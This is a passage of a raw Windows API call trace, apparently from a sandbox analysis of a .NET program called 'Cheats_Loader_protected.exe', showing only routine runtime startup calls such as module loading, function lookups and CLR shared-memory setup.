psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x13ff5b4*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0056.860] SysReAllocStringLen (in: pbstr=0x13ff564*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x13ff564*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0056.860] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchLength=0x43 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 0x43 [0056.860] SysReAllocStringLen (in: pbstr=0x13ff5b4*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x13ff5b4*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 1 [0056.860] SetLastError (dwErrCode=0x0) [0056.864] GetCurrentThreadId () returned 0x13dc [0056.864] GetCurrentThreadId () returned 0x13dc [0056.864] GetCurrentThreadId () returned 0x13dc [0056.864] GetCurrentThreadId () returned 0x13dc [0056.864] GetCurrentThreadId () returned 0x13dc [0056.864] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0056.864] GetCurrentThreadId () returned 0x13dc [0056.864] GetCurrentThreadId () returned 0x13dc [0056.864] GetCurrentThreadId () returned 0x13dc [0056.864] SetEvent (hEvent=0x20c) returned 1 [0056.864] ReadFile (in: hFile=0x274, lpBuffer=0x83ab0, nNumberOfBytesToRead=0xfff, lpNumberOfBytesRead=0x13ff5b8, lpOverlapped=0x0 | out: lpBuffer=0x83ab0*, lpNumberOfBytesRead=0x13ff5b8*=0xfff, lpOverlapped=0x0) returned 1 [0056.871] GetCurrentThreadId () returned 0x13dc [0056.871] GetCurrentThreadId () returned 0x13dc [0056.871] GetCurrentThreadId () returned 0x13dc [0056.871] GetCurrentThreadId () returned 0x13dc [0056.871] GetCurrentThreadId () returned 0x13dc [0056.871] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0056.871] GetCurrentThreadId () returned 0x13dc [0056.871] GetCurrentThreadId () returned 0x13dc [0056.871] GetCurrentThreadId () returned 0x13dc [0056.871] SetEvent (hEvent=0x20c) returned 1 [0056.871] ReadFile (in: hFile=0x274, lpBuffer=0x88ff8, nNumberOfBytesToRead=0x17f7, lpNumberOfBytesRead=0x13ff5a0, lpOverlapped=0x0 | out: lpBuffer=0x88ff8*, lpNumberOfBytesRead=0x13ff5a0*=0x17f7, lpOverlapped=0x0) returned 1 [0056.873] GetCurrentThreadId () returned 0x13dc [0056.873] GetCurrentThreadId () returned 0x13dc [0056.873] GetCurrentThreadId () returned 0x13dc [0056.873] GetCurrentThreadId () returned 0x13dc [0056.873] GetCurrentThreadId () returned 0x13dc [0056.873] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0056.873] GetCurrentThreadId () returned 0x13dc [0056.873] GetCurrentThreadId () returned 0x13dc [0056.873] GetCurrentThreadId () returned 0x13dc [0056.873] SetEvent (hEvent=0x20c) returned 1 [0056.873] ReadFile (in: hFile=0x274, lpBuffer=0x88ff8, nNumberOfBytesToRead=0x1001, lpNumberOfBytesRead=0x13ff5b0, lpOverlapped=0x0 | out: lpBuffer=0x88ff8*, lpNumberOfBytesRead=0x13ff5b0*=0x1001, lpOverlapped=0x0) returned 1 [0056.874] GetCurrentThreadId () returned 0x13dc [0056.874] GetCurrentThreadId () returned 0x13dc [0056.874] GetCurrentThreadId () returned 0x13dc [0056.874] GetCurrentThreadId () returned 0x13dc [0056.874] GetCurrentThreadId () returned 0x13dc [0056.874] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0056.874] GetCurrentThreadId () returned 0x13dc [0056.874] GetCurrentThreadId () returned 0x13dc [0056.874] GetCurrentThreadId () returned 0x13dc [0056.874] SetEvent (hEvent=0x20c) returned 1 [0056.874] ReadFile (in: hFile=0x274, lpBuffer=0x88ff8, nNumberOfBytesToRead=0x1002, lpNumberOfBytesRead=0x13ff5b0, lpOverlapped=0x0 | out: lpBuffer=0x88ff8*, lpNumberOfBytesRead=0x13ff5b0*=0x1002, lpOverlapped=0x0) returned 1 [0056.875] GetCurrentThreadId () returned 0x13dc [0056.875] GetCurrentThreadId () returned 0x13dc [0056.875] GetCurrentThreadId () returned 0x13dc [0056.875] GetCurrentThreadId () returned 0x13dc [0056.875] GetCurrentThreadId () returned 0x13dc [0056.875] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0056.875] GetCurrentThreadId () returned 0x13dc [0056.875] GetCurrentThreadId () returned 0x13dc [0056.875] GetCurrentThreadId () returned 0x13dc [0056.875] SetEvent (hEvent=0x20c) returned 1 [0056.875] ReadFile (in: hFile=0x274, lpBuffer=0x81aa8, nNumberOfBytesToRead=0x1f28, lpNumberOfBytesRead=0x13ff5a4, lpOverlapped=0x0 | out: lpBuffer=0x81aa8*, lpNumberOfBytesRead=0x13ff5a4*=0x1f28, lpOverlapped=0x0) returned 1 [0056.879] GetCurrentThreadId () returned 0x13dc [0056.879] ResetEvent (hEvent=0x200) returned 1 [0056.879] GetCurrentThreadId () returned 0x13dc [0056.879] GetCurrentThreadId () returned 0x13dc [0056.879] GetCurrentThreadId () returned 0x13dc [0056.879] GetCurrentThreadId () returned 0x13dc [0056.879] ResetEvent (hEvent=0x200) returned 1 [0056.879] GetCurrentThreadId () returned 0x13dc [0056.879] GetCurrentThreadId () returned 0x13dc [0056.879] SetEvent (hEvent=0x20c) returned 1 [0056.879] SetEvent (hEvent=0x200) returned 1 [0056.879] CloseHandle (hObject=0x274) returned 1 [0056.880] SysReAllocStringLen (in: pbstr=0x13ffb30*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x13ffb30*="kernel32") returned 1 [0056.880] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0056.880] GetModuleHandleW (lpModuleName="kernel32") returned 0x772d0000 [0056.882] GetProcAddress (hModule=0x772d0000, lpProcName="GetNumaHighestNodeNumber") returned 0x772e75e0 [0056.923] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xe7c144, cbMultiByte=8, lpWideCharStr=0x13feb14, cchWideChar=2047 | out: lpWideCharStr="kernel32ޠ") returned 8 [0056.923] SysReAllocStringLen (in: pbstr=0x13ffb18*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x13ffb18*="kernel32") returned 1 [0056.924] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0056.924] GetModuleHandleA (lpModuleName="kernel32") returned 0x772d0000 [0056.926] GetProcAddress (hModule=0x772d0000, lpProcName="FlsSetValue") returned 0x772e4b40 [0056.928] GetProcAddress (hModule=0x772d0000, lpProcName="FlsGetValue") returned 0x772e4b20 [0056.930] GetProcAddress (hModule=0x772d0000, lpProcName="FlsAlloc") returned 0x772e4ae0 [0056.932] GetProcAddress (hModule=0x772d0000, lpProcName="FlsFree") returned 0x772e4b00 [0056.959] SysReAllocStringLen (in: pbstr=0x13ff250*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x13ff250*="KERNEL32.DLL") returned 1 [0056.959] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0056.959] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0056.961] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemWindowsDirectoryW") returned 0x772e5560 [0057.065] SysReAllocStringLen (in: pbstr=0x13ff568*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x13ff568*="advapi32") returned 1 [0057.065] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0057.066] GetModuleHandleW (lpModuleName="advapi32") returned 0x756e0000 [0057.066] GetProcAddress (hModule=0x756e0000, lpProcName="AllocateAndInitializeSid") returned 0x756ff440 [0057.066] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessToken") returned 0x756fefb0 [0057.066] GetProcAddress (hModule=0x756e0000, lpProcName="GetTokenInformation") returned 0x756fee90 [0057.066] GetCurrentThreadId () returned 0x13dc [0057.066] ResetEvent (hEvent=0x200) returned 1 [0057.066] GetCurrentThreadId () returned 0x13dc [0057.066] GetCurrentThreadId () returned 0x13dc [0057.066] GetCurrentThreadId () returned 0x13dc [0057.066] GetCurrentThreadId () returned 0x13dc [0057.066] ResetEvent (hEvent=0x200) returned 1 [0057.066] GetCurrentThreadId () returned 0x13dc [0057.067] GetCurrentThreadId () returned 0x13dc [0057.067] SetEvent (hEvent=0x20c) returned 1 [0057.067] SetEvent (hEvent=0x200) returned 1 [0057.067] CloseHandle (hObject=0x290) returned 1 [0057.067] GetCurrentThreadId () returned 0x13dc [0057.067] ResetEvent (hEvent=0x200) returned 1 [0057.067] GetCurrentThreadId () returned 0x13dc [0057.067] GetCurrentThreadId () returned 0x13dc [0057.067] GetCurrentThreadId () returned 0x13dc [0057.067] GetCurrentThreadId () returned 0x13dc [0057.067] ResetEvent (hEvent=0x200) returned 1 [0057.067] GetCurrentThreadId () returned 0x13dc [0057.067] GetCurrentThreadId () returned 0x13dc [0057.067] SetEvent (hEvent=0x20c) returned 1 [0057.067] SetEvent (hEvent=0x200) returned 1 [0057.067] CloseHandle (hObject=0x294) returned 1 [0057.067] GetProcAddress (hModule=0x756e0000, lpProcName="InitializeAcl") returned 0x756ff850 [0057.067] GetProcAddress (hModule=0x756e0000, lpProcName="AddAccessAllowedAce") returned 0x756ff510 [0057.067] GetProcAddress (hModule=0x756e0000, lpProcName="FreeSid") returned 0x756ffa80 [0057.069] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x7fb28, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName="Global\\Cor_Private_IPCBlock_v4_5080") returned 0x294 [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] ResetEvent (hEvent=0x200) returned 1 [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] ResetEvent (hEvent=0x200) returned 1 [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] SetEvent (hEvent=0x20c) returned 1 [0057.070] SetEvent (hEvent=0x200) returned 1 [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] GetCurrentThreadId () returned 0x13dc [0057.070] SetEvent (hEvent=0x20c) returned 1 [0057.070] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x710000 [0057.071] SysReAllocStringLen (in: pbstr=0x13ff568*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x13ff568*="advapi32") returned 1 [0057.071] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0057.072] GetModuleHandleW (lpModuleName="advapi32") returned 0x756e0000 [0057.072] GetProcAddress (hModule=0x756e0000, lpProcName="AllocateAndInitializeSid") returned 0x756ff440 [0057.072] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessToken") returned 0x756fefb0 [0057.072] GetProcAddress (hModule=0x756e0000, lpProcName="GetTokenInformation") returned 0x756fee90 [0057.072] GetCurrentThreadId () returned 0x13dc [0057.072] ResetEvent (hEvent=0x200) returned 1 [0057.072] GetCurrentThreadId () returned 0x13dc [0057.072] GetCurrentThreadId () returned 0x13dc [0057.072] GetCurrentThreadId () returned 0x13dc [0057.072] GetCurrentThreadId () returned 0x13dc [0057.072] ResetEvent (hEvent=0x200) returned 1 [0057.072] GetCurrentThreadId () returned 0x13dc [0057.072] GetCurrentThreadId () returned 0x13dc [0057.072] SetEvent (hEvent=0x20c) returned 1 [0057.072] SetEvent (hEvent=0x200) returned 1 [0057.072] CloseHandle (hObject=0x290) returned 1 [0057.072] GetCurrentThreadId () returned 0x13dc [0057.073] ResetEvent (hEvent=0x200) returned 1 [0057.073] GetCurrentThreadId () returned 0x13dc [0057.073] GetCurrentThreadId () returned 0x13dc [0057.073] GetCurrentThreadId () returned 0x13dc [0057.073] GetCurrentThreadId () returned 0x13dc [0057.073] ResetEvent (hEvent=0x200) returned 1 [0057.073] GetCurrentThreadId () returned 0x13dc [0057.073] GetCurrentThreadId () returned 0x13dc [0057.073] SetEvent (hEvent=0x20c) returned 1 [0057.073] SetEvent (hEvent=0x200) returned 1 [0057.073] CloseHandle (hObject=0x298) returned 1 [0057.073] SysReAllocStringLen (in: pbstr=0x13ff2d0*=0x0, psz="combase.dll", len=0xb | out: pbstr=0x13ff2d0*="combase.dll") returned 1 [0057.073] CharLowerBuffW (in: lpsz="combase.dll", cchLength=0xb | out: lpsz="combase.dll") returned 0xb [0057.073] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\combase.dll", hFile=0x0, dwFlags=0x0) returned 0x74940000 [0057.073] GetLastError () returned 0x0 [0057.074] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0057.074] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0057.074] GetModuleFileNameA (in: hModule=0x74940000, lpFilename=0x13ff1b4, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")) returned 0x1f [0057.074] GetCurrentProcess () returned 0xffffffff [0057.074] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff2b8*=0x74b3f374, NumberOfBytesToProtect=0x13ff2bc, NewAccessProtection=0x4, OldAccessProtection=0x13ff2f0 | out: BaseAddress=0x13ff2b8*=0x74b3f000, NumberOfBytesToProtect=0x13ff2bc, OldAccessProtection=0x13ff2f0*=0x2) returned 0x0 [0057.074] GetCurrentProcess () returned 0xffffffff [0057.074] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff2b8*=0x74b3f374, NumberOfBytesToProtect=0x13ff2bc, NewAccessProtection=0x2, OldAccessProtection=0x13ff2f0 | out: BaseAddress=0x13ff2b8*=0x74b3f000, NumberOfBytesToProtect=0x13ff2bc, OldAccessProtection=0x13ff2f0*=0x4) returned 0x0 [0057.074] GetCurrentProcess () returned 0xffffffff [0057.074] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff2b8*=0x74b3f37c, NumberOfBytesToProtect=0x13ff2bc, NewAccessProtection=0x4, OldAccessProtection=0x13ff2f0 | out: BaseAddress=0x13ff2b8*=0x74b3f000, NumberOfBytesToProtect=0x13ff2bc, OldAccessProtection=0x13ff2f0*=0x2) returned 0x0 [0057.074] GetCurrentProcess () returned 0xffffffff [0057.074] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff2b8*=0x74b3f37c, NumberOfBytesToProtect=0x13ff2bc, NewAccessProtection=0x2, OldAccessProtection=0x13ff2f0 | out: BaseAddress=0x13ff2b8*=0x74b3f000, NumberOfBytesToProtect=0x13ff2bc, OldAccessProtection=0x13ff2f0*=0x4) returned 0x0 [0057.075] SetLastError (dwErrCode=0x0) [0057.075] GetProcAddress (hModule=0x74940000, lpProcName="RoInitialize") returned 0x74a24d90 [0057.075] FreeLibrary (hLibModule=0x74940000) returned 1 [0057.075] GetProcAddress (hModule=0x756e0000, lpProcName="InitializeAcl") returned 0x756ff850 [0057.075] GetProcAddress (hModule=0x756e0000, lpProcName="AddAccessAllowedAce") returned 0x756ff510 [0057.075] GetProcAddress (hModule=0x756e0000, lpProcName="FreeSid") returned 0x756ffa80 [0057.076] SysReAllocStringLen (in: pbstr=0x13ff540*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13ff540*="kernel32.dll") returned 1 [0057.076] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0057.076] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0057.078] GetProcAddress (hModule=0x772d0000, lpProcName="AddSIDToBoundaryDescriptor") returned 0x772e7530 [0057.080] GetProcAddress (hModule=0x772d0000, lpProcName="CreateBoundaryDescriptorW") returned 0x772e7550 [0057.082] GetProcAddress (hModule=0x772d0000, lpProcName="CreatePrivateNamespaceW") returned 0x772e75c0 [0057.084] GetProcAddress (hModule=0x772d0000, lpProcName="OpenPrivateNamespaceW") returned 0x772e75a0 [0057.085] SysReAllocStringLen (in: pbstr=0x13ff470*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x13ff470*="advapi32") returned 1 [0057.085] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0057.085] GetModuleHandleW (lpModuleName="advapi32") returned 0x756e0000 [0057.085] GetProcAddress (hModule=0x756e0000, lpProcName="AllocateAndInitializeSid") returned 0x756ff440 [0057.086] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessToken") returned 0x756fefb0 [0057.086] GetProcAddress (hModule=0x756e0000, lpProcName="GetTokenInformation") returned 0x756fee90 [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] ResetEvent (hEvent=0x200) returned 1 [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] ResetEvent (hEvent=0x200) returned 1 [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] SetEvent (hEvent=0x20c) returned 1 [0057.086] SetEvent (hEvent=0x200) returned 1 [0057.086] CloseHandle (hObject=0x298) returned 1 [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] ResetEvent (hEvent=0x200) returned 1 [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] ResetEvent (hEvent=0x200) returned 1 [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] GetCurrentThreadId () returned 0x13dc [0057.086] SetEvent (hEvent=0x20c) returned 1 [0057.086] SetEvent (hEvent=0x200) returned 1 [0057.087] CloseHandle (hObject=0x290) returned 1 [0057.087] GetProcAddress (hModule=0x756e0000, lpProcName="InitializeAcl") returned 0x756ff850 [0057.087] GetProcAddress (hModule=0x756e0000, lpProcName="AddAccessAllowedAce") returned 0x756ff510 [0057.087] GetProcAddress (hModule=0x756e0000, lpProcName="FreeSid") returned 0x756ffa80 [0057.088] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x7fd50, flProtect=0x8000004, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10000, lpName="Cor_CLR_WRITER\\Cor_SxSPublic_IPCBlock") returned 0x298 [0057.088] GetCurrentThreadId () returned 0x13dc [0057.088] ResetEvent (hEvent=0x200) returned 1 [0057.088] GetCurrentThreadId () returned 0x13dc [0057.088] GetCurrentThreadId () returned 0x13dc [0057.089] GetCurrentThreadId () returned 0x13dc [0057.089] GetCurrentThreadId () returned 0x13dc [0057.089] ResetEvent (hEvent=0x200) returned 1 [0057.089] GetCurrentThreadId () returned 0x13dc [0057.089] GetCurrentThreadId () returned 0x13dc [0057.089] SetEvent (hEvent=0x20c) returned 1 [0057.089] SetEvent (hEvent=0x200) returned 1 [0057.089] GetCurrentThreadId () returned 0x13dc [0057.089] GetCurrentThreadId () returned 0x13dc [0057.089] GetCurrentThreadId () returned 0x13dc [0057.089] GetCurrentThreadId () returned 0x13dc [0057.089] GetCurrentThreadId () returned 0x13dc [0057.089] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0057.089] GetCurrentThreadId () returned 0x13dc [0057.089] GetCurrentThreadId () returned 0x13dc [0057.089] GetCurrentThreadId () returned 0x13dc [0057.089] SetEvent (hEvent=0x20c) returned 1 [0057.089] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x720000 [0057.089] SysReAllocStringLen (in: pbstr=0x13ff64c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13ff64c*="kernel32.dll") returned 1 [0057.089] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0057.090] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0057.092] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteBoundaryDescriptor") returned 0x772e7590 [0057.155] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\cheats_loader_protected.exe.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0057.156] GetLastError () returned 0x2 [0057.157] SysReAllocStringLen (in: pbstr=0x13ffa70*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log", len=0x5d | out: pbstr=0x13ffa70*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log") returned 1 [0057.157] GetThreadLocale () returned 0x409 [0057.157] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0057.157] GetThreadLocale () returned 0x409 [0057.157] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0057.157] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log", nBufferLength=0x104, lpBuffer=0x13ff7f4, lpFilePart=0x13ff7f0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log", lpFilePart=0x13ff7f0*="Cheats_Loader_protected.exe.log") returned 0x5d [0057.157] SysReAllocStringLen (in: pbstr=0x13ffa70*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log", psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log", len=0x5d | out: pbstr=0x13ffa70*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log") returned 1 [0057.157] SysReAllocStringLen (in: pbstr=0x13ffa20*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log", len=0x5d | out: pbstr=0x13ffa20*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log") returned 1 [0057.157] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log", cchLength=0x5d | out: lpsz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\cheats_loader_protected.exe.log") returned 0x5d [0057.157] SysReAllocStringLen (in: pbstr=0x13ffa70*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\Cheats_Loader_protected.exe.log", psz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\cheats_loader_protected.exe.log", len=0x5d | out: pbstr=0x13ffa70*="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\cheats_loader_protected.exe.log") returned 1 [0057.157] SetLastError (dwErrCode=0x2) [0057.182] SysReAllocStringLen (in: pbstr=0x13ff8f0*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x13ff8f0*="kernel32") returned 1 [0057.182] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0057.182] GetModuleHandleW (lpModuleName="kernel32") returned 0x772d0000 [0057.185] GetProcAddress (hModule=0x772d0000, lpProcName="WerRegisterRuntimeExceptionModule") returned 0x772e7b90 [0057.188] SysReAllocStringLen (in: pbstr=0x13ff5fc*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13ff5fc*="kernel32.dll") returned 1 [0057.188] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0057.189] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0057.191] GetProcAddress (hModule=0x772d0000, lpProcName="RaiseException") returned 0x772e5e20 [0057.192] SysReAllocStringLen (in: pbstr=0x13ffb40*=0x0, psz="mscoree.dll", len=0xb | out: pbstr=0x13ffb40*="mscoree.dll") returned 1 [0057.193] CharLowerBuffW (in: lpsz="mscoree.dll", cchLength=0xb | out: lpsz="mscoree.dll") returned 0xb [0057.193] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x74270000 [0057.193] GetProcAddress (hModule=0x74270000, lpProcName=0x18) returned 0x74284ed0 [0057.193] GetProcAddress (hModule=0x74150000, lpProcName=0x18) returned 0x7415db40 [0057.197] GetCurrentThreadId () returned 0x13dc [0057.197] ResetEvent (hEvent=0x200) returned 1 [0057.197] GetCurrentThreadId () returned 0x13dc [0057.197] GetCurrentThreadId () returned 0x13dc [0057.197] GetCurrentThreadId () returned 0x13dc [0057.197] GetCurrentThreadId () returned 0x13dc [0057.197] ResetEvent (hEvent=0x200) returned 1 [0057.197] GetCurrentThreadId () returned 0x13dc [0057.197] GetCurrentThreadId () returned 0x13dc [0057.197] SetEvent (hEvent=0x20c) returned 1 [0057.197] SetEvent (hEvent=0x200) returned 1 [0057.197] CloseHandle (hObject=0x0) returned 0 [0057.199] SysReAllocStringLen (in: pbstr=0x13ff960*=0x0, psz="api-ms-win-core-memory-l1-1-0.dll", len=0x21 | out: pbstr=0x13ff960*="api-ms-win-core-memory-l1-1-0.dll") returned 1 [0057.199] CharLowerBuffW (in: lpsz="api-ms-win-core-memory-l1-1-0.dll", cchLength=0x21 | out: lpsz="api-ms-win-core-memory-l1-1-0.dll") returned 0x21 [0057.199] GetModuleHandleW (lpModuleName="api-ms-win-core-memory-l1-1-0.dll") returned 0x74bc0000 [0057.200] SysReAllocStringLen (in: pbstr=0x13ff960*=0x0, psz="api-ms-win-core-libraryloader-l1-1-0.dll", len=0x28 | out: pbstr=0x13ff960*="api-ms-win-core-libraryloader-l1-1-0.dll") returned 1 [0057.200] CharLowerBuffW (in: lpsz="api-ms-win-core-libraryloader-l1-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-core-libraryloader-l1-1-0.dll") returned 0x28 [0057.200] GetModuleHandleW (lpModuleName="api-ms-win-core-libraryloader-l1-1-0.dll") returned 0x74bc0000 [0057.200] SysReAllocStringLen (in: pbstr=0x13ff960*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x13ff960*="ntdll.dll") returned 1 [0057.200] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0057.200] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77970000 [0057.201] GetProcAddress (hModule=0x74bc0000, lpProcName="SetSystemFileCacheSize") returned 0x74d2e210 [0057.201] GetProcAddress (hModule=0x77970000, lpProcName="NtSetSystemInformation") returned 0x779e36e0 [0057.201] GetProcAddress (hModule=0x74bc0000, lpProcName="PrivIsDllSynchronizationHeld") returned 0x0 [0057.239] SysReAllocStringLen (in: pbstr=0x13ffaf8*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x13ffaf8*="kernel32") returned 1 [0057.239] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0057.240] GetModuleHandleW (lpModuleName="kernel32") returned 